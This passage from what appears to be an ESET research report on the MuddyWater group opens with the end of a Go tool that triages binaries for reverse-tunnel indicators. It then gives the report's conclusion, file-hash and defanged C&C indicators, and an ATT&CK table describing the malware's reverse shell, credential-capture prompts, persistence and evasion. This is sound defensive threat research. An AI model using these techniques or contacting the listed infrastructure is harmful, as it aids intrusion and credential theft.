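	deps := 0
	for _, f := range findings {
		switch f.Indicator {
		case "module-name":
			return true
		case "dependency":
			deps++
		}
	}
	return deps >= 2
}

// TriageText parses build info in the textual form of Figure 9.
func TriageText(data string) ([]Finding, error) {
	bi, err := debug.ParseBuildInfo(data)
	if err != nil {
		return nil, err
	}
	return Triage(bi), nil
}

// TriageFile reads the build info embedded in a Go binary on disk.
func TriageFile(path string) ([]Finding, error) {
	bi, err := buildinfo.ReadFile(path)
	if err != nil {
		return nil, err
	}
	return Triage(bi), nil
}

func main() {
	if len(os.Args) < 2 {
		// No binaries given: report on the Figure 9 build strings.
		findings, _ := TriageText(figure9BuildInfo)
		fmt.Printf("figure 9: likely reverse tunnel = %v, findings = %v\n", LikelyReverseTunnel(findings), findings)
		return
	}
	for _, path := range os.Args[1:] {
		findings, err := TriageFile(path)
		if err != nil {
			fmt.Printf("%s: %v\n", path, err)
			continue
		}
		fmt.Printf("%s: likely reverse tunnel = %v, findings = %v\n", path, LikelyReverseTunnel(findings), findings)
	}
}
```

Run it as `go run triage.go suspect.exe` over a directory of collected binaries; binaries whose build info has been removed return a read error rather than a clean result, which is itself worth noting. The yamux and go-socks5 hits alone should be confirmed against the hardcoded C&C address and connection key described below before escalating.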

The primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&C server, using a hardcoded connection key to authenticate with the C&C server via SSL/TLS. This setup allows the attacker to route C&C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&C server.

Conclusion

This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational immaturity remain.

MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.

ESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. 
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1 Filename Detection Description
76632910CF67697BF5D7285FAE38BFCF438EC082 OsUpdater.exe Win64/MuddyWater.E MuddyWater – Fooder launcher.
1723D5EA7185D2E339FA9529D245DAA5D5C9A932 Blub.exe Win64/MuddyWater.H MuddyWater – Blub browser-data stealer.
69B097D8A3205605506E6C1CC3C13B71091CB519 Blub.exe Win64/MuddyWater.H MuddyWater – Blub browser-data stealer.
B7A8F09CB5FF8A33653988FFBA585118ACF24C13 Blub.exe Win64/MuddyWater.H MuddyWater – Blub browser-data stealer.
B8997526E4781A6A1479690E30072F38E091899D stealer.exe Win64/MuddyWater.H MuddyWater – Blub browser-data stealer.
8E21DE54638A79D8489C59D958B23FE22E90944A 7d1e9726b5YZPYc.dll Win32/MuddyWater.B MuddyWater – CE-Notes browser-data stealer.
CD47420F5CE408D95C98306D78B977CDA0400C8F fe197add74IVcQn.exe Win64/MuddyWater.I MuddyWater – CE-Notes browser-data stealer.
C1299E8C9A8567A9C292157F3ED65B818AA78900 vmsvc.exe Win64/MuddyWater.I MuddyWater – CE-Notes browser-data stealer.
29CDA06701F9A9C0A6791775C3EB70F5B52BBEFF 3a70e4c8c2IVcQn.exe Win64/MuddyWater.C MuddyWater – LP-Notes credential stealer.
8F3ED626E7B929450E36E97BA5539C8371DF0EF8 3a70e4c8c2IVcQn.exe Win64/MuddyWater.C MuddyWater – LP-Notes credential stealer.
007B5CD6D6ACF972F7743F79E23CAB9BB2ECBEE3 Dsync-es.exe Win64/MuddyWater.F MuddyWater – Mimikatz loader.
CD36F93DBC4C718930593D8F029EFDCAA52B619B App_chek.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded HackBrowserData tool.
47B70C47BEB33E88B4197D6AF1B768230E51B067 steam.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel.
D46900D78AE036967E0B37F9EC6A8000131AE604 antimage.exe Win32/MuddyWater.A MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel.
0657D0B0610618886DDD74C3D0A1D582CDD24863 wtsapi32.dll Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
2939FD218E0145D730BD94AA1C76386A5259EACE msi.dll Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
3BC6502A55A4D5D29132DA4D9943E154A810CC83 WinWin.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
7950296331802188EB99E232E2C383CB9FDD5D7D 20241118_223247_Launcher.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
8580824FE14DB158388102B16C1C79DFBBA36083 Launcher.dll Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
B48B93B4EB69D01588D371356EDE614C5E7378DE Launcher.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
EA8A1C2382FF765709D7F78EF60482598E4C0DEB vcruntime140_1.dll Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
EAF4BAFC62170C9FCA1F6B591848883DBF97F93D Launcher.exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
F5EFBA6CCBA5A6AD6C3AFA928C0E5EAA44597411 ncrypt.dll Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
13DA612D75DC5268F5235F5BACE6D8F0DB0091FF WinWin(persist).exe Win64/MuddyWater.G MuddyWater – Fooder loader with embedded MuddyViper backdoor.
25361183DE63F296BA71B6FCF0725E022B3C989A 0bff183a39ruQsY.dll WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
0E9A4892CFA1C9065B36D8F2E164E28609A8CF5D 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
2B09241CA025BDC4455E9F6BA6009E2F27C08EDF dttcodexgigas.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
2E9BE23CDD8152DB6CD1A54E001C4EA82FF6F1C6 7295be2b1fHxjyf.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
45FA7DE711FEA1F8D1E348E87834246C455DD2ED fa54125dc8ZpaNJ.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
4E0EF2386980639FC5355FD68DAFF54EB2AD622E 20d188afdcWgOQB.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
4E9529BA4A6E42D6278D37E3FDEE9E1D991CEBE0 bd34a33f5bHOVby.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
50C6D4A2AD16A231CF11C43F3BBC868D90E20D25 re.exe WinGo/TrojanProxy.Agent.F MuddyWater – go‑socks5 reverse tunnel.
52009F36058337B6401DA0A0F4885A0C185F0520 bd34a33f5bHOVby.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
535882B6EDAB29247E035236A84CA510FB1E0854 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
544CE18E4C1F1B288DEE6018DFCF4E4D4A315F7A 1110254b63WfTEa.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
54EBC125039CC83E4682CA44DD592534562B25C3 FMAPP.dll WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
5A08150C1DC17E9F691296F0A577C2EC9BA8028C bd34a33f5bJeJOf.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 proxy reverse tunnel.
5D1E61DA8083C41FF1FC23A1222A4A88B43A4E9B bd34a33f5bJeJOf.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
6532E0437C8913FA418F1EE258561B15BBEE9052 7295be2b1fHxjyf.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
6CA41565844118385B345A39A9B79E0BBC0DD338 re.exe WinGo/TrojanProxy.Agent.F MuddyWater – go‑socks5 reverse tunnel.
6FC50A99AAE1D6C40111632D4F49BD19F9794CF6 8525e604dfKuDNr.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
826CFF5D85713CE4B2F3C15AB53A84E6848D2E2C bd34a33f5bJeJOf.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
87ADD79C7C8335447113EE0D413F52AE2B17F066 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
93055115559219BE8441880597C533381B99213B main.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
97C3376AB551E899F347CC9DDF49EA01DB2D7903 504f53ca8esoLmG.dll WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
99FAD0862E2E8D363F3E18952FD92E09493CC27D 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
A101CBCCD950AA36FC3B40C3C331FDE43ACDBBD2 66f3e097e4tnyHR.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
A227C0A4425E24268B759A740231676A589CA4E6 fa54125dc8ZpaNJ.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
A997A7AAE727D2C12CCE80FE3607317775A4DF3E fa54125dc8ZpaNJ.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
B0271CA76052EC340014D7BCCDBD69325A4E60F2 7295be2b1fAzMZI.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
B0CD4F5DF192BFFE6500E44B80C28505DFD9CA66 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
B16E7D56A8DC0FF6B3AFD797E1EAB22B20DFFB39 ESETGO.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
D49979D0063B28BD73390481E6AE642C00CE0791 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
D518F5C648AB64B390A29AA2858219318CFC556A bd34a33f5bHOVby.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
DF223D653F761ED55F9C0774F1DBF545FD741F86 66f3e097e4tnyHR.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
DF8FC5213AA11EE445EAD1AAE17A826E7D51A743 Revoke.dll WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
E02DD79A8CAED662969F6D5D0792F2CB283116E8 66f3e097e4tnyHR.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
E8F4EA3857EF5FDFEC1A2063D707609251F207DB main.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
F26CAE9E79871DF3A47FA61A755DC028C18451FC 7295be2b1fAzMZI.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
FF09608790077E1BA52C03D9390E0805189ADAD7 20d188afdcpfLFq.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.
A9747A3F58F8F408FECEFC48DB0A18A1CB6DACAE AppVs.exe WinGo/TrojanProxy.Agent.D MuddyWater – go‑socks5 reverse tunnel.

Network

IP Domain Hosting provider First seen Details
3.95.7[.]142 N/A Amazon Data Services NoVa 2024‑09‑08 MuddyWater C&C server.
35.175.224[.]64 N/A Amazon Technologies Inc. 2024‑10‑10 MuddyWater C&C server.
51.16.209[.]105 api.tikavodot.co[.]il Amazon Data Services Ireland Technical Role Account 2024‑09‑15 MuddyWater C&C server.
62.106.66[.]112 N/A RIPE-NCC-HM-MNT, ORG-NCC1-RIPE 2024‑09‑29 MuddyWater staging server.
157.20.182[.]45 N/A Hosterdaddy Private Limited 2024‑04‑18 MuddyWater staging server.
161.35.172[.]55 N/A DigitalOcean, LLC 2022‑11‑12 MuddyWater staging server.
167.99.224[.]13 magicallyday[.]com DigitalOcean, LLC 2022‑11‑06 MuddyWater C&C server.
194.11.246[.]78 N/A HosterDaddy Private Limited 2024‑07‑23 MuddyWater C&C server.
194.11.246[.]101 processplanet[.]org Administrator 2024‑08‑27 MuddyWater staging and C&C server.
206.71.149[.]51 N/A BL Networks 2023‑10‑30 MuddyWater staging server.
212.232.22[.]136 N/A HosterDaddy Private Limited 2025‑01‑16 MuddyWater C&C server.

MITRE ATT&CK techniques

This table was built using version 17 of the MITRE ATT&CK framework.

Tactic ID Name Description
Reconnaissance T1591 Gather Victim Org Information MuddyWater gathers victim org information to use in spearphishing emails.
Resource Development T1583 Acquire Infrastructure MuddyWater uses acquired infrastructure to host malware download locations and C&C servers.
T1608 Stage Capabilities MuddyWater stages tools like RMM tools and information stealers on file-hosting sites such as OneHub and Mega Limited.
T1587.001 Develop Capabilities: Malware MuddyWater develops backdoors like MuddyViper and tools such as the Fooder loader, LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers.
T1588.002 Obtain Capabilities: Tool MuddyWater uses publicly available tools from GitHub, such as HackBrowserData and Go-based reverse proxies.
Initial Access T1566.002 Phishing: Spearphishing Link MuddyWater uses spearphishing emails with links to file hosting sites like OneHub and Mega Limited to host RMM software (Atera, Level, and PDQ).
Execution T1059.001 Command-Line Interface: PowerShell MuddyViper has the capability to open and execute PowerShell scripts.
T1059.003 Command-Line Interface: Windows Command Shell MuddyViper has the capability to provide the Windows Command shell as a reverse shell.
T1559.001 Inter-Process Communication: Component Object Model MuddyViper uses the ITaskService COM object to create a scheduled task for persistence.
T1106 Native API MuddyViper uses the CreateProcess API to execute additional files and commands.
T1204.001 User Execution: Malicious Link MuddyWater operators rely on targets clicking malicious links delivered through spearphishing.
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder MuddyViper has the capability to copy itself to the victim's Startup folder.
T1543.003 Create or Modify System Process: Windows Service MuddyWater operators attempt to install RMM tools in %PROGRAMFILES%, which also includes creating a Windows service set to autostart.
T1053 Scheduled Task/Job MuddyViper can be persisted as a scheduled task named ManageOnDriveUpdater.
Defense Evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft The LP-Notes and CE-Notes tools attempt to impersonate a logged-on user's security context via ImpersonateLoggedOnUser.
T1140 Deobfuscate/Decode Files or Information Blub uses string obfuscation for storing stolen data.
Fooder can extract embedded, AES-encrypted payloads.
CE-Notes and LP-Notes both use a custom byte-wise decryption routine to decrypt strings.
T1620 Reflective Code Loading The Fooder loader performs reflective code loading to run additional tools (MuddyViper, reverse tunnels, and HackBrowserData).
T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion MuddyViper uses many calls to a sleep function to detect and avoid virtualization and analysis environments, and generally to inhibit dynamic analysis.
T1027.007 Obfuscated Files or Information: Dynamic API Resolution CE-Notes and LP-Notes perform dynamic API resolution by decrypting strings at runtime.
T1134.002 Access Token Manipulation: Create Process with Token Fooder's launcher attempts to duplicate the token of a process specified by the operator when launching Fooder via CreateProcessAsUserA.
T1622 Debugger Evasion MuddyViper searches for specific debugging tools, adjusting its behavior accordingly.
T1070.009 Indicator Removal: Clear Persistence MuddyViper can modify registry keys used for persistence, if instructed to uninstall itself.
T1070.004 Indicator Removal: File Deletion MuddyViper can delete itself from the system, if instructed to uninstall itself.
T1036 Masquerading Some versions of Fooder masquerade as a harmless Snake game.
T1036.004 Masquerading: Masquerade Task or Service MuddyViper can create a task named ManageOnDriveUpdater.
T1112 Modify Registry MuddyViper can modify the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup and HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup registry keys, to change the location of the Startup folder.
T1027.009 Obfuscated Files or Information: Embedded Payloads Fooder can extract an embedded, AES-encrypted payload.
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File Fooder can extract an embedded, AES-encrypted payload.
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers CE-Notes and Blub attempt to steal credentials stored in browsers.
T1056.002 Input Capture: GUI Input Capture MuddyViper and LP-Notes are able to display a Windows security login prompt to capture login credentials and verify the credentials' veracity by relaying those credentials to legitimate Windows APIs.
Discovery T1082 System Information Discovery MuddyViper collects system information from compromised systems and reports it back to the C&C server.
T1518.001 Software Discovery: Security Software Discovery MuddyViper attempts to get a process list of running programs, looks for security-related processes and, if found, reports them to the C&C server and modifies its behavior.
Collection T1074.001 Data Staged: Local Data Staging Blub, CE-Notes, and LP-Notes stage stolen credentials on disk for MuddyViper, reverse tunnels, or RMM tools to collect and exfiltrate.
T1560.001 Archive Collected Data: Archive via Utility MuddyViper uses PowerShell's Compress-Archive command to compress browser data collected via the HackBrowserData tool.
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography MuddyViper uses AES-CBC encryption to encrypt data before exchanging data with the C&C server.
T1219 Remote Access Software MuddyWater uses Atera, Level, and PDQ RMM tools for remote access to victims' systems.
T1071.001 Application Layer Protocol: Web Protocols MuddyViper uses HTTPS for C&C communications. The reverse tunnels use a mix of HTTP and HTTPS for C&C communications.
T1105 Ingress Tool Transfer MuddyViper has the capability to download additional payloads from its C&C server.
T1001 Data Obfuscation MuddyViper leverages HTTPS for C&C communications, using the Status header to hide a backdoor command ID in the server-to-client direction of the communication.
T1090 Proxy MuddyWater uses customized versions of go‑socks5 reverse proxy tools.
Exfiltration T1041 Exfiltration Over C2 Channel MuddyWater tools exfiltrate data to C&C servers using C&C channels (HTTP and HTTPS).
T1030 Data Transfer Size Limits MuddyViper supports downloading/uploading files in chunks of limited size.
